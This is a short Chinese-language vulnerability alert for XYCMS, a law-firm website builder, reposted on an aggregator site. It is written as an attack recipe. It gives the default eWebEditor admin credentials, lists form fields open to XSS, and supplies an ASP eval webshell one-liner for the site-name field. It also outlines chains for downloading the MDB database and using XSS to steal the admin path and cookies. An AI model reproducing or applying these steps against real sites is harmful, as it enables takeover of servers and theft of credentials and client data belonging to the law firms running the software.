
XYCMS律師事務所建站系統V1.0多處缺陷漏洞預警-電腦資
料
##XYCMS律師事務所建站系統V1.0
##B0mbErM@n;2011-2-18
#eWebEditor
##Ur=XY2010Pass=XY2010
##XSS
#Qq:[XSS]
Mail:[XSS]
Photo:[XSS]
Contents:[XSS]
##Eval
#WebName:<%evalrequest("pass")%>
##MDB
##Hacking
1:eWebEditor
2:XSS+Eval
(1)標題和姓名寫的真實些
(2)插入XSS獲取后臺路徑以及cookie
(3)Eval
3:MDB+Eval
(1)MDB
(2)Eval
4:XSS+MDB+Eval
(1)MDB
(2)XSS-標題和姓名寫的真實些
(3)插入XSS獲取后臺路徑
(4)Eval
本文發布于:2023-03-13 15:17:37,感謝您對本站的認可!
本文鏈接:http://m.newhan.cn/zhishi/a/167869185828071.html
版權聲明:本站內容均來自互聯網,僅供演示用,請勿用于商業和其他非法用途。如果侵犯了您的權益請與我們聯系,我們將在24小時內刪除。
本文word下載地址:xycms.doc
本文 PDF 下載地址:xycms.pdf
| 留言與評論(共有 0 條評論) |